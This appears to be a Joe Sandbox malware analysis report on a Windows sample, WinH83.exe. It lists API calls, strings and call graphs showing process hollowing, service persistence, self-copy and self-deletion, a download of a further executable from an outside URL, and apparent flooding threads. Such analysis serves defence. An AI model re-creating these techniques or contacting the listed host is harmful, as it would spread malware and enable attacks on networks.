      • API ID: AddressFreeLibraryProc
      • String ID: DnsFlushResolverCache
      • API String ID: 3013587201-2186135719
      • Opcode ID: 74f0ee3f8432daaa9068a4e807a241aa99ee2c4d0fd81151e60a8f6ca162a658
      • Instruction ID: 1f75d3966693e7a36abaddef8804c89aec62f9cfac8ca5470afc03c7ea179309
      • Opcode Fuzzy Hash: 74f0ee3f8432daaa9068a4e807a241aa99ee2c4d0fd81151e60a8f6ca162a658
      • Instruction Fuzzy Hash: 75D0A931A828628AC62267602C083EF2290AD0170130A0032ED93F12A1CB3C9C9240AD

      Execution Graph

      Execution Coverage:8.7%
      Dynamic/Decrypted Code Coverage:0%
      Signature Coverage:0%
      Total number of Nodes:541
      Total number of Limit Nodes:6
      execution_graph 1404 401860 GetModuleHandleA GetProcAddress 1405 40189a 1404->1405 1406 4018a5 GlobalAlloc 1405->1406 1407 401a0b printf 1405->1407 1408 4018c1 1406->1408 1408->1407 1409 4018c9 LoadLibraryExA 1408->1409 1410 4018f2 GetLastError printf 1409->1410 1411 40190f GlobalFree GetProcAddress 1409->1411 1412 401940 1411->1412 1413 40192a printf 1411->1413 1422 401720 1412->1422 1415 401949 1416 401952 printf 1415->1416 1417 401968 printf 1415->1417 1418 40198e 1417->1418 1419 4019ed printf FreeLibrary 1418->1419 1429 401680 1418->1429 1426 401748 1422->1426 1423 401839 printf 1424 401847 1423->1424 1424->1415 1425 401833 1425->1423 1425->1424 1426->1423 1426->1425 1427 4017dc printf 1426->1427 1428 40181e 1426->1428 1427->1426 1428->1415 1430 401688 DeviceIoControl 1429->1430 1431 4016b7 printf 1429->1431 1430->1431 1432 4016ad GetLastError 1430->1432 1431->1418 1431->1419 1432->1431 1433 401b60 CreateFileA 1434 401b85 GetFileSize 1433->1434 1435 401bcb CloseHandle 1433->1435 1434->1435 1436 401b98 ??2@YAPAXI ReadFile CloseHandle 1434->1436 1437 401f60 RegisterServiceCtrlHandlerA SetServiceStatus 1438 401ff3 1437->1438 1460 401000 LoadLibraryA 1438->1460 1441 40202e 1465 405440 1441->1465 1442 402009 1442->1441 1444 402011 1442->1444 1443 40201d 1445 4054b0 3 API calls 1443->1445 1447 4053c0 3 API calls 1444->1447 1448 40201b 1445->1448 1447->1448 1449 40203d GetModuleFileNameA 1448->1449 1468 404c10 GetModuleHandleA GetProcAddress 1449->1468 1451 40205d 1469 405270 CreateFileA 1451->1469 1453 402083 1454 402093 1453->1454 1455 40208c ExitProcess 1453->1455 1477 401030 GetSystemDirectoryA 1454->1477 1457 402098 GetCurrentProcess SetPriorityClass 1480 402310 CreateMutexA GetLastError 1457->1480 1459 4020af 1461 401012 GetProcAddress 1460->1461 1462 40102b 1460->1462 1463 401022 1461->1463 1464 401024 FreeLibrary 1461->1464 1462->1441 1462->1442 1462->1443 1463->1464 1464->1462 1466 405452 1465->1466 1467 40545c GetSystemDirectoryA lstrcat lstrcpy 
1465->1467 1466->1449 1467->1449 1468->1451 1470 4052a4 1469->1470 1471 40531f 1469->1471 1470->1471 1472 4052a8 GetFileSize ??2@YAPAXI ReadFile 1470->1472 1471->1453 1473 405303 CloseHandle ??3@YAXPAX 1472->1473 1474 4052ec 1472->1474 1473->1453 1484 405330 1474->1484 1476 405301 1476->1473 1478 401079 1477->1478 1478->1478 1479 40108e GetPEB GetPEB GetPEB 1478->1479 1479->1457 1481 402338 CloseHandle 1480->1481 1482 40234a WSAStartup 1480->1482 1481->1459 1483 40236c CreateThread WaitForSingleObject CloseHandle Sleep 1482->1483 1483->1483 1519 4023a0 1483->1519 1490 404d20 1484->1490 1486 40535f 1487 4053a9 1486->1487 1499 405050 1486->1499 1487->1476 1489 405388 VirtualFree 1489->1476 1491 404eb3 1490->1491 1492 404d35 1490->1492 1491->1486 1492->1491 1493 404d9a VirtualAlloc 1492->1493 1494 404ea6 1493->1494 1496 404db9 memmove 1493->1496 1494->1486 1498 404e13 1496->1498 1497 404e42 memmove 1497->1498 1498->1494 1498->1497 1511 404f50 CreateProcessA 1499->1511 1501 405091 1502 40525c 1501->1502 1503 4050e4 1501->1503 1505 4050ca VirtualProtectEx 1501->1505 1502->1489 1504 40521b TerminateProcess CloseHandle CloseHandle CloseHandle 1503->1504 1514 404f00 LoadLibraryA 1503->1514 1504->1489 1507 4050fa 1505->1507 1507->1504 1508 40516c WriteProcessMemory WriteProcessMemory 1507->1508 1508->1504 1509 4051aa SetThreadContext ResumeThread CloseHandle CloseHandle 1508->1509 1509->1489 1512 404fa5 GetThreadContext ReadProcessMemory VirtualQueryEx 1511->1512 1513 405039 1511->1513 1512->1501 1513->1501 1515 404f15 GetProcAddress 1514->1515 1516 404f3f 1514->1516 1517 404f25 1515->1517 1518 404f38 FreeLibrary 1515->1518 1516->1507 1517->1518 1518->1516 1520 4025c5 socket 1519->1520 1521 4023b8 lstrlen 1519->1521 1593 4030e0 inet_addr 1520->1593 1522 4023e6 1521->1522 1587 402c80 wvsprintfA OutputDebugStringA 1522->1587 1525 402c71 1527 4023f3 strstr 1528 402420 1527->1528 1529 4024a2 1527->1529 1530 402517 strstr 1528->1530 1588 401440 LoadLibraryA 1529->1588 1536 
402541 strstr 1530->1536 1537 40252e 1530->1537 1532 40262b 1533 402c6a closesocket 1532->1533 1596 402fd0 1532->1596 1533->1525 1534 4024af _strlwr lstrcpy strstr 1534->1530 1538 4024dc 1534->1538 1536->1520 1540 402550 strcspn strncpy strcspn strstr 1536->1540 1537->1536 1541 4024e2 Sleep 1538->1541 1539 40265e 1601 402cb0 RegOpenKeyExA 1539->1601 1540->1520 1543 402596 strcspn strncpy atoi 1540->1543 1544 401440 6 API calls 1541->1544 1543->1520 1546 4024f6 _strlwr lstrcpy strstr 1544->1546 1545 40266b 1547 402682 send 1545->1547 1546->1530 1546->1541 1547->1533 1577 4026a4 1547->1577 1548 402c54 InterlockedExchange shutdown 1548->1533 1549 4026b3 select 1549->1548 1549->1577 1550 4026fb __WSAFDIsSet 1550->1549 1551 40270d recv 1550->1551 1551->1548 1551->1577 1552 402744 InterlockedExchange 1552->1577 1553 40276a CreateThread 1553->1553 1553->1577 1761 403110 WSASocketA 1553->1761 1554 402b8a InterlockedExchange 1554->1549 1555 402b9c OpenMutexA 1556 402bc1 GetSystemDirectoryA lstrcat lstrcat DeleteFileA 1555->1556 1557 402bb3 ReleaseMutex CloseHandle 1555->1557 1627 4022c0 OpenSCManagerA 1556->1627 1557->1556 1558 402a27 CreateThread 1558->1577 1783 4046c0 htons 1558->1783 1559 402791 CreateThread 1559->1559 1559->1577 1791 403110 28 API calls 1559->1791 1560 4027b2 CreateThread 1560->1577 1792 403110 28 API calls 1560->1792 1561 401390 6 API calls 1567 402b1e ExitWindowsEx 1561->1567 1563 402a93 shutdown closesocket 1563->1549 1567->1549 1569 402a73 send 1569->1549 1570 4027d4 CreateThread 1570->1570 1570->1577 1634 403440 WSAStartup WSASocketA 1570->1634 1571 402af5 ExitWindowsEx 1571->1549 1572 4027fb CreateThread 1572->1572 1572->1577 1648 403440 13 API calls 1572->1648 1573 402822 CreateThread 1573->1573 1573->1577 1649 403a30 htons 1573->1649 1574 402849 CreateThread 1574->1574 1574->1577 1660 4035d0 1574->1660 1575 402870 CreateThread 1575->1575 1575->1577 1674 403710 htons 1575->1674 1576 402897 CreateThread 1576->1576 1576->1577 1686 403850 socket 
htons 1576->1686 1577->1548 1577->1549 1577->1550 1577->1552 1577->1553 1577->1554 1577->1555 1577->1558 1577->1559 1577->1560 1577->1561 1577->1563 1577->1569 1577->1570 1577->1572 1577->1573 1577->1574 1577->1575 1577->1576 1578 4028d4 CreateThread 1577->1578 1579 4028be CreateThread 1577->1579 1580 4028f0 CreateThread CreateThread 1577->1580 1581 40291e CreateThread 1577->1581 1582 402945 CreateThread 1577->1582 1583 40296c CreateThread 1577->1583 1584 402993 CreateThread 1577->1584 1585 4029b4 CreateThread 1577->1585 1586 4029ce recv 1577->1586 1612 401390 GetCurrentProcess OpenProcessToken 1577->1612 1619 401640 LoadLibraryA GetProcAddress 1577->1619 1621 401510 LoadLibraryA LoadLibraryA GetProcAddress GetProcAddress 1577->1621 1578->1577 1694 403cc0 htons 1578->1694 1579->1578 1579->1579 1700 403ba0 htons 1579->1700 1580->1577 1711 403cc0 8 API calls 1580->1711 1712 403d70 htons 1580->1712 1581->1577 1581->1581 1720 403cc0 8 API calls 1581->1720 1582->1577 1582->1582 1721 403e20 strstr 1582->1721 1583->1577 1583->1583 1736 404340 htons 1583->1736 1584->1577 1584->1584 1746 404090 strstr 1584->1746 1585->1577 1775 404490 1585->1775 1586->1577 1587->1527 1589 401503 1588->1589 1590 40145c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 1588->1590 1589->1534 1592 4014a0 FreeLibrary 1590->1592 1592->1534 1594 4030f0 gethostbyname 1593->1594 1595 4025fa htons connect 1593->1595 1594->1595 1595->1525 1595->1532 1597 402fe9 setsockopt 1596->1597 1598 402fde 1596->1598 1599 403016 WSAIoctl 1597->1599 1600 40300e 1597->1600 1598->1539 1599->1539 1600->1539 1602 402d14 RegQueryValueExA RegCloseKey 1601->1602 1603 402d95 GetVersionExA 1601->1603 1602->1603 1607 402d72 1602->1607 1605 402dfc 1603->1605 1610 402e09 wsprintfA GlobalMemoryStatusEx 1603->1610 1605->1545 1606 402d78 _strnicmp 1606->1603 1606->1607 1607->1603 1607->1606 1632 4056b0 1610->1632 1613 4013b3 1612->1613 1614 4013b7 LookupPrivilegeValueA 1612->1614 1613->1571 1615 4013cd CloseHandle 
1614->1615 1616 4013de AdjustTokenPrivileges 1614->1616 1615->1571 1617 401421 CloseHandle 1616->1617 1618 401432 1616->1618 1617->1571 1618->1571 1620 40166e FreeLibrary 1619->1620 1620->1577 1622 401567 1621->1622 1623 401581 ??2@YAPAXI 1622->1623 1624 40161c FreeLibrary FreeLibrary 1622->1624 1625 40159b 1623->1625 1624->1577 1625->1624 1626 40159f strncpy CreateProcessA 1625->1626 1626->1624 1628 402304 wsprintfA SHDeleteKeyA closesocket ExitProcess 1627->1628 1629 4022d6 OpenServiceA 1627->1629 1630 4022f5 DeleteService CloseServiceHandle 1629->1630 1631 4022ff CloseServiceHandle 1629->1631 1630->1631 1631->1628 1633 402f28 _ui64toa GetSystemDefaultUILanguage 1632->1633 1633->1545 1635 403488 setsockopt 1634->1635 1636 40347a 1634->1636 1637 4034b5 setsockopt 1635->1637 1638 4034a7 1635->1638 1639 4030e0 2 API calls 1637->1639 1640 4034f1 1639->1640 1793 4011a0 1640->1793 1642 403500 GetCurrentProcessId 1643 4035b4 1642->1643 1646 403544 1642->1646 1644 403550 GetTickCount 1644->1646 1645 403568 sendto 1645->1646 1646->1643 1646->1644 1646->1645 1647 40359e Sleep 1646->1647 1647->1646 1650 4030e0 2 API calls 1649->1650 1654 403a70 1650->1654 1651 403b81 1652 403a84 socket connect 1653 403b7a closesocket 1652->1653 1652->1654 1653->1651 1654->1651 1654->1652 1655 4011a0 GetTickCount srand rand 1654->1655 1656 403af2 sprintf send 1654->1656 1655->1654 1657 403b54 closesocket 1656->1657 1658 403b3a Sleep 1656->1658 1657->1652 1659 403b68 1657->1659 1658->1654 1658->1657 1796 4056d0 1660->1796 1663 4030e0 2 API calls 1664 403610 1663->1664 1665 4036fd 1664->1665 1666 40362e socket setsockopt 1664->1666 1667 4011a0 3 API calls 1666->1667 1670 403664 1667->1670 1668 4011a0 3 API calls 1668->1670 1669 403691 sendto 1669->1670 1671 4036b5 Sleep 1669->1671 1670->1668 1670->1669 1672 4036cb closesocket Sleep 1670->1672 1671->1670 1672->1666 1673 4036eb 1672->1673 1675 4030e0 2 API calls 1674->1675 1676 40374c 1675->1676 1677 40383d 1676->1677 1678 40376a socket connect 
setsockopt 1676->1678 1679 4011a0 3 API calls 1678->1679 1681 4037ae 1679->1681 1680 4011a0 3 API calls 1680->1681 1681->1680 1682 4037d8 send 1681->1682 1684 40380b closesocket Sleep 1681->1684 1682->1681 1683 4037f5 Sleep 1682->1683 1683->1681 1684->1678 1685 40382b 1684->1685 1687 4030e0 2 API calls 1686->1687 1688 40389b htons htons htons htons htons 1687->1688 1689 403a1c 1688->1689 1691 403906 1688->1691 1690 4011a0 GetTickCount srand rand 1690->1691 1691->1690 1692 403957 sendto Sleep 1691->1692 1692->1691 1693 403a0a 1692->1693 1695 4030e0 2 API calls 1694->1695 1697 403cf9 1695->1697 1696 403d61 1697->1696 1698 403d1f socket connect Sleep closesocket Sleep 1697->1698 1698->1698 1699 403d52 1698->1699 1701 4030e0 2 API calls 1700->1701 1706 403bdc 1701->1706 1702 403c9c 1703 403c00 socket connect 1704 403c21 closesocket 1703->1704 1703->1706 1704->1706 1705 4011a0 3 API calls 1705->1706 1706->1702 1706->1703 1706->1705 1707 4011a0 3 API calls 1706->1707 1708 403c60 send 1707->1708 1709 403c71 Sleep 1708->1709 1710 403c7f closesocket Sleep 1708->1710 1709->1706 1709->1710 1710->1706 1713 4030e0 2 API calls 1712->1713 1714 403db0 1713->1714 1715 403dd5 socket connect Sleep 1714->1715 1715->1715 1716 403dfb 1715->1716 1717 403e11 1716->1717 1718 403e04 Sleep 1716->1718 1719 403e1b closesocket 1717->1719 1718->1717 1718->1718 1719->1719 1722 403e72 1721->1722 1723 403e88 strstr 1721->1723 1722->1723 1724 403e97 strcspn strncpy strcspn 1723->1724 1725 403efa htons 1723->1725 1724->1725 1727 4030e0 2 API calls 1725->1727 1728 403f67 wsprintfA 1727->1728 1729 403fd3 1728->1729 1730 40407e 1728->1730 1731 403fda socket connect 1729->1731 1734 40406f 1729->1734 1731->1729 1732 403ffb setsockopt setsockopt 1731->1732 1733 404028 send Sleep 1732->1733 1733->1733 1735 404052 closesocket Sleep 1733->1735 1735->1729 1737 4030e0 2 API calls 1736->1737 1738 40437d wsprintfA 1737->1738 1739 4043d6 1738->1739 1740 40447c 1738->1740 1741 4043df socket connect 1739->1741 1744 
40446d 1739->1744 1741->1739 1742 404400 setsockopt setsockopt 1741->1742 1743 40442d send Sleep 1742->1743 1743->1743 1745 404451 closesocket Sleep 1743->1745 1745->1739 1747 4040e2 1746->1747 1748 4040f8 strstr 1746->1748 1747->1748 1749 404107 strcspn strncpy strcspn 1748->1749 1750 40416a htons 1748->1750 1749->1750 1752 4030e0 2 API calls 1750->1752 1753 4041d7 1752->1753 1754 40432d 1753->1754 1755 404218 wsprintfA 1753->1755 1756 40424b wsprintfA socket connect 1753->1756 1759 40431e 1753->1759 1755->1753 1755->1756 1756->1753 1757 404296 setsockopt setsockopt 1756->1757 1758 4042d3 send Sleep 1757->1758 1758->1758 1760 4042fd closesocket Sleep 1758->1760 1760->1753 1762 403164 setsockopt 1761->1762 1763 403156 1761->1763 1764 403181 1762->1764 1765 40318f setsockopt 1762->1765 1766 4031b0 1765->1766 1767 4031be htons 1765->1767 1768 4030e0 2 API calls 1767->1768 1772 4031e4 1768->1772 1769 403428 1770 403250 17 API calls 1771 403323 htons htons 1770->1771 1770->1772 1771->1772 1772->1769 1772->1770 1772->1771 1773 4033ea sendto Sleep 1772->1773 1773->1773 1774 403413 Sleep 1773->1774 1774->1769 1774->1770 1776 4056d0 1775->1776 1777 40449a LoadLibraryA 1776->1777 1778 4045c0 FreeLibrary 1777->1778 1779 4044be GetProcAddress GetProcAddress GetProcAddress GetProcAddress 1777->1779 1779->1778 1782 4044ff Sleep 1779->1782 1781 4045bf 1781->1778 1782->1781 1784 4030e0 2 API calls 1783->1784 1785 4046f9 1784->1785 1786 40476f 1785->1786 1787 404719 socket 1785->1787 1788 40472c sendto Sleep 1787->1788 1788->1788 1789 40474f closesocket Sleep 1788->1789 1789->1787 1790 404763 1789->1790 1794 4011b3 GetTickCount srand rand 1793->1794 1795 4011ae 1793->1795 1794->1642 1795->1642 1797 4035da htons 1796->1797 1797->1663 1798 4020e0 1799 402145 SetServiceStatus 1798->1799 1800 4020ee 1798->1800 1803 40215d SetServiceStatus 1799->1803 1801 4020f1 1800->1801 1802 40211c SetServiceStatus SetServiceStatus 1800->1802 1801->1803 1804 4020f4 SetServiceStatus SetServiceStatus 
      Call graph (text rendering of the graph image: numbered nodes are function addresses with the APIs they call, "->" entries are call edges); the edge list is omitted here.

      Executed Functions

      Control-flow Graph

      APIs
      • SetErrorMode.KERNELBASE(00000001), ref: 00401D08
      • GetModuleHandleA.KERNEL32(kmon.dll,?,?,?,?,?,000001BC,000007C2), ref: 00401D77
      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,000001BC,000007C2), ref: 00401D7E
      • lstrcat.KERNEL32(?,WinH83.exe), ref: 00401E2C
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E41
      • lstrcmpi.KERNEL32(?,?), ref: 00401E5D
      • GetCurrentProcess.KERNEL32(00004000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E68
      • SetPriorityClass.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401E6F
      • lstrcmpi.KERNEL32(?,?), ref: 00401E96
      • CopyFileA.KERNEL32(?,?,00000000), ref: 00401EB9
      • SetFileAttributesA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,000001BC,000007C2), ref: 00401ECA
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: File$Modulelstrcmpi$AttributesClassCopyCurrentErrorFreeHandleLibraryModeNamePriorityProcesslstrcat
      • String ID: 8$A$B$C$D$E$F$G$H$I$J$K$Mu$O5WGU2RYGMXDGMZSGIXG64THHI4DG===$WinH83$WinH83.exe$Windows Help System83$Windows83$kmon.dll
      • API String ID: 139532127-2983036780
      • Opcode ID: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction ID: 5410645d6abaed84b275c9712b1141a2809baf3a13989eb83d3553c9209378c8
      • Opcode Fuzzy Hash: 0078be2832fa0faa2a8baf98b57dde6bfc22fe376f97e329316eab35eed276fc
      • Instruction Fuzzy Hash: A281F8B0148342ABD310EB60DD45BDB7BD8EF84718F40492EF689661D1EBBCD51887AB

      Control-flow Graph

      APIs
      • LoadLibraryA.KERNELBASE(urlmon.dll,00707474), ref: 004065C9
      • GetProcAddress.KERNEL32 ref: 004065DF
      • LoadLibraryA.KERNELBASE(wininet.dll), ref: 004065F1
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenA), ref: 00406607
      • GetProcAddress.KERNEL32(6F3E0000,InternetOpenUrlA), ref: 0040661F
      • GetProcAddress.KERNEL32(6F3E0000,InternetReadFile), ref: 00406637
      • GetProcAddress.KERNEL32(6F3E0000,InternetCloseHandle), ref: 0040664F
      • Sleep.KERNELBASE(001B7740), ref: 00406660
      • InternetOpenA.WININET(MyAgrent,00000000,00000000,00000000,00000000), ref: 00406674
      • InternetOpenUrlA.WININET(http://www.003zzy.com/ad1in.htm,00000000,00000000,80000000,00000000), ref: 0040669D
      • InternetReadFile.WININET(00406949,000000FF,00406544), ref: 004066C5
      • InternetCloseHandle.WININET ref: 004066D1
      • InternetCloseHandle.WININET ref: 004066DD
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressInternetProc$CloseHandleLibraryLoadOpen$FileReadSleep
      • String ID: C:\WINDOWS\admier.exe$InternetCloseHandle$InternetOpenA$InternetOpenUrlA$InternetReadFile$MyAgrent$URLDownloadToFileA$http$http://www.003zzy.com/ad1in.htm$open$urlmon.dll$wininet.dll
      • API String ID: 4214780637-2500366654
      • Opcode ID: b48563ea9cb6f9baff5769bfe651dd4d1cbef5429e188547ae9e13d74fe99cf0
      • Instruction ID: 65db73e173750bc762846c45c3d24e508618b8540af41c8d1503c79e64b7ea12
      • Opcode Fuzzy Hash: b48563ea9cb6f9baff5769bfe651dd4d1cbef5429e188547ae9e13d74fe99cf0
      • Instruction Fuzzy Hash: 30513CB0685340BFD3119FA4BE1AB563FA5B706B15F22007AF503BA5EAD3B954348B0D

      Control-flow Graph

      Control-flow graph of the function at 0040D07E (basic blocks 40d01f-40d0bd, executed and non-executed blocks marked in the original image; calls DeleteFileA, GetPEB, GetProcAddress, LoadLibraryA and a call to 40d0c2); graph edge list omitted.
      APIs
      • GetProcAddress.KERNEL32(00000000,?,?,?), ref: 0040D047
      • DeleteFileA.KERNELBASE(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction ID: febd643f651e9d90d4cf83c175e36f54a99a928136d9d2cdfec75408947fadb0
      • Opcode Fuzzy Hash: e073e4e49c09ac5b827c9c226607f75e97ca840cd67960b1e5b7da10af76f87f
      • Instruction Fuzzy Hash: DE01B1B1C001149FD3259F94DD44B267769EB03328F25507AE80EBB682D7B9AC0ADA1D

      Control-flow Graph

      Control-flow graph of the function at 0040D06A (basic blocks 40d01f-40d0bd, executed and non-executed blocks marked in the original image; calls DeleteFileA, GetPEB, GetProcAddress, LoadLibraryA and a call to 40d0c2); graph edge list omitted.
      APIs
      • GetProcAddress.KERNEL32(00000000,?,?,?), ref: 0040D047
      • DeleteFileA.KERNELBASE(8.txt), ref: 0040D08A
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressDeleteFileProc
      • String ID: 8.txt
      • API String ID: 3096485378-4108868096
      • Opcode ID: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction ID: 92145c9a365872201136f2ad8642b24408a080cd8a60a41ca3e7793543610a8a
      • Opcode Fuzzy Hash: 5b91d5f4cd43517152a4dd9c6756f64807f1832301644ec7de03dd8f5ce288da
      • Instruction Fuzzy Hash: A0E0EC309852408FC326DBB48959916BB71EB03315F1564B6D009F76A2C378DC4EC61D

      Control-flow Graph

      APIs
      • GetEnvironmentVariableA.KERNEL32(COMSPEC,?,00000104,?,76835280), ref: 004011FA
      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,76835280), ref: 00401214
      • GetShortPathNameA.KERNEL32(?,?,00000104), ref: 00401231
      • Sleep.KERNELBASE(00000001,00000000,?,76835280), ref: 00401242
      • lstrcat.KERNEL32(?,?), ref: 00401284
      • lstrcat.KERNEL32(?,?), ref: 004012C7
      • GetCurrentProcess.KERNEL32 ref: 00401302
      • SetPriorityClass.KERNELBASE(00000000), ref: 0040130F
      • GetCurrentThread.KERNEL32 ref: 00401313
      • SetThreadPriority.KERNELBASE(00000000), ref: 00401320
      • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,0000000C,00000000,00000000,?,00000100), ref: 00401342
      • SetPriorityClass.KERNELBASE(?,00000040), ref: 00401354
      • SetThreadPriority.KERNELBASE(00000100,000000F1), ref: 0040135D
      • ResumeThread.KERNELBASE(00000100), ref: 00401364
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: PriorityThread$ClassCurrentNameProcesslstrcat$CreateEnvironmentFileModulePathResumeShortSleepVariable
      • String ID: /C del $ > nul$COMSPEC$D
      • API String ID: 1484168510-811065519
      • Opcode ID: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction ID: 83a5a0624438e48de483ece212b65a11f95c74cb0b9da3eb9e72a1bcf4c41a49
      • Opcode Fuzzy Hash: 80f2990cbe446eeb8af5fe5e6946dc62fec6deab8f17557c22f9a638df64cf6d
      • Instruction Fuzzy Hash: B541A071644300AFE324CB75DC49FABB7E9BBC4710F008A2DB69AA72D0DBB599048B55

      Control-flow Graph

      Control-flow graph of the function at 0040D016 (basic blocks 40d016-40d0bd, executed and non-executed blocks marked in the original image; calls LoadLibraryA, GetProcAddress, DeleteFileA, GetPEB and a call to 40d0c2); graph edge list omitted.
      APIs
      • LoadLibraryA.KERNELBASE(00400000,00400000), ref: 0040D028
      • GetProcAddress.KERNEL32(00000000,?,?,?), ref: 0040D047
      Memory Dump Source
      • Source File: 00000001.00000002.1368010015.000000000040D000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.1367920095.0000000000400000.00000002.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367943080.0000000000401000.00000040.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367965265.000000000040A000.00000080.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1367989003.000000000040B000.00000010.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368036303.000000000040E000.00000004.00000001.01000000.00000006.sdmp
      • Associated: 00000001.00000002.1368059956.000000000040F000.00000002.00000001.01000000.00000006.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_WinH83.jbxd
      Similarity
      • API ID: AddressLibraryLoadProc
      • String ID:
      • API String ID: 2574300362-0
      • Opcode ID: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction ID: 6c3bf372d224c83a881a8ca97f7b757c9271284dc59a6cb52084675be33e3eb9
      • Opcode Fuzzy Hash: 14e5a918ddaf0084f4d854524b0471831e9950063073d57c4f2344471fdd9e3b
      • Instruction Fuzzy Hash: 42E065B18401289BD3245B40ED44762371CDB02328F194079EC097F682D77E6C07861C

      Non-executed Functions

      Control-flow Graph

      APIs
      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 004021AB
      • CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 004021DA
      • GetLastError.KERNEL32 ref: 004021E9
      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 004021FD
